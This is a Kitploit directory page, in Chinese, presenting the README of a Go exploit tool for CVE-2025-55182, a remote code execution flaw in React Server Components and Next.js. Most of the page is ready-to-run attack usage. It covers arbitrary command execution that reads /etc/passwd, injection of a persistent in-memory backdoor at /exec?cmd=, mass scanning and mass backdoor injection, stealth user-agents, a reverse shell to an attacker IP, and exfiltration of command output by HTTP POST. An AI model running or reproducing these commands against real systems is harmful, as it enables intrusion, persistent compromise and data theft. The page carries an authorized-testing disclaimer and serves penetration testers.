Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-55182-golang-PoC — 基于Go的CVE-2025-55182概念验证,这是React Server Components中的一个严重RCE漏洞。具有漏洞检查、命令执行、内存shell注入、反向shell、批量扫描和代理支持,用于授权的安全测试。 | Kitploit
工具/GitHubGitHub/keklick1337/cve-2025-55182-golang-poc
漏洞分析漏洞利用Web应用程序漏洞利用后渗透利用渗透测试命令与控制红队远程访问工具Payload 开发

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
GitHubkeklick1337/cve-2025-55182-golang-poc

CVE-2025-55182-golang-PoC

基于Go的CVE-2025-55182概念验证,这是React Server Components中的一个严重RCE漏洞。具有漏洞检查、命令执行、内存shell注入、反向shell、批量扫描和代理支持,用于授权的安全测试。

查看仓库网站
6119个月前尚未审核
分享

CVE-2025-55182 React Server Components 远程代码执行 - Go PoC

⚠️ 仅供授权安全测试使用 ⚠️

描述

CVE-2025-55182(又称 CVE-2025-66478)是 React Server Components(Flight 协议)中的一个严重远程代码执行漏洞。本工具是该 PoC 的 Go 实现,用于安全研究和授权渗透测试。

受影响版本:

  • react-server-dom-webpack: 19.0.0 - 19.2.0
  • Next.js: 15.x(补丁版本之前:15.0.5、15.1.9、15.2.6、15.3.6、15.4.8、15.5.7)
  • Next.js: 16.x(16.0.7 之前)
  • Next.js: 14.3.0-canary.77 及更高版本的 canary 版本

漏洞详情

该漏洞利用 Flight 协议反序列化中的原型污染:

  1. 使用 $@ 反序列化获取 Chunk 引用
  2. 将 Chunk.prototype.then 设置为根对象的 then 属性
  3. 将状态设置为 RESOLVED_MODEL,以受控的伪造 chunk 调用 initializeModelChunk
  4. 触发 Blob 反序列化,该过程使用攻击者载荷调用 response._formData.get
  • 将 response._formData.get 设置为 Function 构造函数,以实现任意代码执行
  • 功能特性

    • 完整的 RCE 能力 - 执行任意命令并获取输出
    • 漏洞检查模式 - 不进行利用的安全检测
    • Next.js 版本检测 - 自动版本指纹识别
    • 内存 Shell 注入 - 在 /exec?cmd= 处持久化后门
    • 批量扫描 - 支持 JSON 输出的多线程扫描
    • 全面的代理支持:
      • 支持/不支持身份验证的 SOCKS5
      • SOCKS4/SOCKS4a
      • 支持/不支持身份验证的 HTTP/HTTPS 代理
    • 隐身模式 - 浏览器、爬虫、安全 User-Agent
    • 速率限制 - 请求间可配置延迟
    • 反弹 Shell - mkfifo + nc(适用于 Alpine/busybox)
    • 数据外泄 - 通过 HTTP POST 将命令输出发送到攻击者服务器
    • 跨平台构建 - 30 多种操作系统/架构组合
    • JSON 输出 - 面向自动化的机器可读结果

    安装

    预编译二进制文件

    从 GitHub Releases 下载适用于您平台的最新版本。

    可用的二进制文件:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64
    • macOS: amd64 (Intel), arm64 (Apple Silicon)
    • FreeBSD、OpenBSD、NetBSD: amd64, 386, arm, arm64
    • 以及更多...

    从源码构建

    root@kitploit:~
    # Clone repository
    git clone https://github.com/keklick1337/CVE-2025-55182-golang-PoC.git
    cd CVE-2025-55182-golang-PoC
    
    # Build for current platform
    go build -o cve-2025-55182 .
    
    # Or build for all platforms
    chmod +x build.sh
    ./build.sh
    

    从源码构建

    运行 ./build.sh 后,适用于所有受支持平台的二进制文件将位于 build/ 目录中。

    使用方法

    基本命令

    root@kitploit:~
    # Check single target for vulnerability
    ./cve-2025-55182 -u http://target:3000 --check
    
    # Detect Next.js version
    ./cve-2025-55182 -u http://target:3000 --version-check
    
    # Execute command with output
    ./cve-2025-55182 -u http://target:3000 -c "id"
    ./cve-2025-55182 -u http://target:3000 -c "cat /etc/passwd"
    

    内存 Shell(持久化后门)

    root@kitploit:~
    # Inject memory shell (checks if already installed first)
    ./cve-2025-55182 -u http://target:3000 --memshell
    
    # Test if memory shell is active
    ./cve-2025-55182 -u http://target:3000 --test-shell
    
    # Execute command via memory shell
    ./cve-2025-55182 -u http://target:3000 --shell-exec "cat /etc/passwd"
    
    # After injection, you can also use curl directly:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=whoami'
    

    自定义请求头与 SSL 绕过

    root@kitploit:~
    # Add custom headers (can be used multiple times)
    ./cve-2025-55182 -u http://target:3000 --check -H 'Authorization: Bearer token123'
    ./cve-2025-55182 -u http://target:3000 --check -H 'Host: example.com' -H 'X-Forwarded-For: 127.0.0.1'
    
    # Skip SSL certificate verification (for self-signed certs)
    ./cve-2025-55182 -u https://target:3000 --check -k
    ./cve-2025-55182 -u https://target:3000 --check --insecure
    
    # Combine with other options
    ./cve-2025-55182 -u https://target:3000 -c "id" -k -H 'Cookie: session=abc123' --proxy socks5://127.0.0.1:1080
    

    代理支持

    root@kitploit:~
    # SOCKS5 with authentication
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://user:[email protected]:1080
    
    # SOCKS5 without authentication
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks5://127.0.0.1:1080
    
    # SOCKS4 proxy
    ./cve-2025-55182 -u http://target:3000 --check --proxy socks4://127.0.0.1:1080
    
    # HTTP proxy
    ./cve-2025-55182 -u http://target:3000 --check --proxy http://127.0.0.1:8080
    

    批量扫描

    root@kitploit:~
    # Batch check from file
    ./cve-2025-55182 --urls targets.txt --check
    
    # Batch scan with JSON output
    ./cve-2025-55182 --urls targets.txt --check --json -o results.json
    
    # Batch scan with multiple threads and stealth
    ./cve-2025-55182 -f targets.txt --check --threads 20 --stealth crawler --delay 2s
    
    # Save vulnerable targets to file
    ./cve-2025-55182 -f targets.txt --check -o vulnerable.txt
    
    # Batch memory shell injection
    ./cve-2025-55182 --urls targets.txt --memshell --workers 10
    
    # Batch command execution
    ./cve-2025-55182 --urls targets.txt -c "id" --threads 5
    

    网络外泄

    root@kitploit:~
    # Reverse shell (mkfifo + nc, works on Alpine)
    ./cve-2025-55182 -u http://target:3000 --revshell 10.0.0.1 4444
    
    # Start listener on attacker machine first:
    nc -lvnp 4444
    
    # Exfiltrate command output via HTTP POST
    ./cve-2025-55182 -u http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444
    
    # Start listener: nc -lvnp 4444
    

    选项

    选项描述
    -u, --url目标 URL(例如 http://localhost:3000)
    -f, --file包含目标 URL 的文件(每行一个)
    --urls-f/--file 的别名
    -o, --output漏洞目标的输出文件
    --json以 JSON 格式输出结果
    -c, --command要执行的命令(带输出)
    --check检查漏洞
    --version-check检测 Next.js 版本
    --proxy代理 URL(socks5://user:pass@ip:port、socks4://ip:port、http://ip:port)
    -H, --header自定义请求头(可多次使用)
    -k, --insecure跳过 SSL/TLS 证书验证
    --stealth隐身模式:browser、crawler、security(默认:browser)
    --delay请求之间的延迟(例如 2s、500ms)
    --variants使用多个载荷变体进行彻底检查
    --memshell注入内存 Shell(持久化后门)
    --test-shell测试内存 Shell 是否处于活动状态
    --shell-exec通过内存 Shell 执行命令
    --revshell IP PORT建立反弹 Shell
    --exfil CMD IP PORT执行命令并通过 HTTP POST 输出结果
    -t, --timeout请求超时时间(秒)(默认:15)
    --threads并发线程数(默认:10)
    --workers--threads 的别名
    --nocolor禁用彩色输出(适用于 Windows/管道)
    -h, --help显示帮助信息
    -v, --version

    代理类型

    root@kitploit:~
    socks5://user:pass@ip:port  - SOCKS5 with authentication
    socks5://ip:port            - SOCKS5 without authentication  
    socks5h://ip:port           - SOCKS5 with remote DNS resolution
    socks4://ip:port            - SOCKS4 proxy
    socks4a://ip:port           - SOCKS4a proxy
    http://user:pass@ip:port    - HTTP proxy with authentication
    http://ip:port              - HTTP proxy without authentication
    https://ip:port             - HTTPS proxy
    

    隐身模式

    模式描述
    browser模拟真实浏览器请求(Chrome、Firefox、Safari、Edge)- 默认
    crawler模拟搜索引擎爬虫(Googlebot、Bingbot、Baiduspider 等)
    security使用安全扫描器 User-Agent(Nessus、Nuclei)

    内存 Shell

    内存 Shell 功能注入一个持久化后门,该后门:

    1. 首先检查 - 注入前,验证 Shell 是否已安装
    2. 挂钩 http.Server.prototype.emit - 拦截所有 HTTP 请求
    3. 创建 /exec 端点 - 接受 cmd 查询参数
    4. 在重启前持续存在 - 持久驻留于服务器内存中
    root@kitploit:~
    # After injection:
    curl 'http://target:3000/exec?cmd=id'
    curl 'http://target:3000/exec?cmd=ls+-la'
    curl 'http://target:3000/exec?cmd=cat+/etc/passwd'
    

    项目结构

    root@kitploit:~
    .
    ├── main.go                   # CLI entry point
    ├── pkg/
    │   ├── colors/
    │   │   └── colors.go         # Terminal colors with --nocolor support
    │   ├── exploit/
    │   │   └── exploit.go        # Core exploit logic, memory shell, version detection
    │   ├── proxy/
    │   │   └── proxy.go          # SOCKS4/5, HTTP proxy support
    │   ├── scanner/
    │   │   └── scanner.go        # Batch scanning with JSON output
    │   └── stealth/
    │       └── stealth.go        # User-Agent randomization
    ├── build.sh                  # Cross-platform build script
    ├── go.mod                    # Go module file
    ├── go.sum                    # Go dependencies
    └── README.md                 # This file
    

    跨平台构建

    build.sh 脚本可为 30 多个平台构建:

    • Linux: amd64, 386, arm, arm64, mips, mipsle, mips64, riscv64, ppc64, s390x
    • Windows: amd64, 386, arm64 (.exe)
    • macOS: amd64 (Intel)、arm64 (Apple Silicon)
    • FreeBSD: amd64, 386, arm, arm64
    • OpenBSD: amd64, 386, arm, arm64
    • NetBSD: amd64, 386, arm, arm64
    • DragonFly BSD: amd64
    • Solaris/Illumos: amd64
    • Plan 9: amd64, 386
    • AIX: ppc64
    root@kitploit:~
    chmod +x build.sh
    ./build.sh
    

    JSON 输出格式

    使用 --json 标志时,结果将以 JSONL 格式保存(每行一个 JSON):

    root@kitploit:~
    {"url":"http://target:3000","vulnerable":true,"version":"15.0.3","checked_at":"2025-12-06T12:00:00Z","response_time_ms":1234}
    

    完整报告(_report.json)包括:

    root@kitploit:~
    {
      "scan_time": "2025-12-06T12:00:00Z",
      "total_urls": 100,
      "vulnerable_count": 5,
      "safe_count": 90,
      "timeout_count": 5,
      "results": [...]
    }
    

    版本检测

    该工具可从以下来源检测 Next.js 版本:

    • X-Powered-By 请求头
    • HTML/JS 源码(__NEXT_DATA__、/_next/ 路径)
    • 构建清单模式

    易受攻击的版本将以红色突出显示。

    免责声明

    ⚠️ 重要法律声明 ⚠️

    本工具严格仅供教育目的和授权安全测试使用。

    预期用途

    • 安全研究与漏洞评估
    • 获得书面许可的授权渗透测试
    • 测试您自己的应用程序和基础设施
    • 在受控实验室环境中的教育演示
    • 开发补丁和安全缓解措施

    禁止用途

    严格禁止将本工具用于:

    • 针对您不拥有或未经明确书面授权测试的系统
    • 任何恶意、非法或未经授权的活动
    • 未经授权访问计算机系统或网络
    • 违反任何适用的地方、州、国家或国际法律
    • 未经授权破坏、损害或危害系统

    法律警告

    未经授权访问计算机系统在世界上大多数司法管辖区均属刑事犯罪,包括但不限于:

    • 🇺🇸 美国:计算机欺诈与滥用法(CFAA)- 最高可判处 20 年监禁
    • 🇪🇺 欧盟:关于攻击信息系统的指令 2013/40/EU
    • 🇷🇺 俄罗斯:《刑法》第 272-274 条
    • 🇬🇧 英国:1990 年《计算机滥用法》
    • 🇩🇪 德国:《德国刑法典》第 202a-202d 条
    • 🇨🇳 中国:《刑法》第 285-287 条

    无担保

    本软件按“原样”提供,不附带任何明示或暗示的担保。作者和版权持有人不对因使用本软件而产生的任何索赔、损害或其他责任负责。

    用户责任

    下载、安装或使用本工具即表示您确认:

    1. 您对自己的行为全权负责
    2. 您仅会在自己拥有或明确授权测试的系统上使用本工具
    3. 您理解并接受使用本软件所涉及的所有风险
    4. 作者对任何误用或造成的损害不承担任何责任

    如果您不同意这些条款,请勿使用本工具。

    作者

    Vladislav Tislenko aka keklick1337
    日期:2025-12-05

    许可证

    本项目根据 MIT 许可证 授权 - 详情请参阅 LICENSE 文件。


    负责任地使用。保持合法。🔐

    下载工具
    显示版本